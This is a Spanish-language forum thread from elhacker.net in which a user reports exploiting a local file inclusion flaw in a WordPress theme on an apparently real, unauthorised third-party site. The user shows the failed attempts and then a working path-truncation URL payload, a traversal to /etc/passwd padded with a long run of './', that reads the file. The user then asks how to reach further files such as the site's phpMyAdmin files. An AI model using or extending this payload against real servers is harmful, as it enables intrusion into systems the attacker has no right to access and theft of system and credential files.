Foro de elhacker.net

hola espero peudan ayudarme o entiendan del tema tengo esto en X web afectada es un LFI

Al intentar un simple ../../etc/passwd me tira este error

Warning: require_once(lang/../etc/passwd.php) [function.require-once]: failed to open stream: No such file or directory in /nfs/c05/h03/mnt/69751/domains/xxx.111.xxx/html/wp-content/themes/xxx.111.xxx/single.php on line 6

muy seguramente tiene que tener esto algo como esto
" include($_GET['page'] . '.php'); " en el codigo donde permite solo .php

luego intente con un NULL bye %00 pero estaba tambien con filtro dejandomelo en \0 asi que decidi usar "fuerza automatizada" jajaja y me saco esto.


http://webafectada.com/123123/?lang=de&lang=invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.



con eso pude ver el passwd y ya no pedia el .php al ultimo como extension me parecio algo extraño y mire el error a ver si lo logran entender:


Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /etc/passwd:12) in /nfs/c05/h03/mnt/69751/domains/xxx.111.xxx/html/wp-content/themes/xxxxxx/header.php on line 3

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /etc/passwd:12) in /nfs/c05/h03/mnt/69751/domains/xxx.111.xxx/html/wp-content/themes/xxx.1111.xxx/header.php on line 3


asi logre ver el /etc/passwd pero deseo saber PORQUE? que quiere decir eso? y porque cuando quiero ver otros archivos mas que todo fuera del etc o fuera de su directorio no logro verlo ellos tienen un PHPMYADMIN y no logro verlos aun sabiendo el path completo.

Si alguien puede entenderlo mejor el porque de ese error me ayudaria mucho  ;-)

Hola coldalfred, que programa estas usando? Me parece bastante curioso ese método!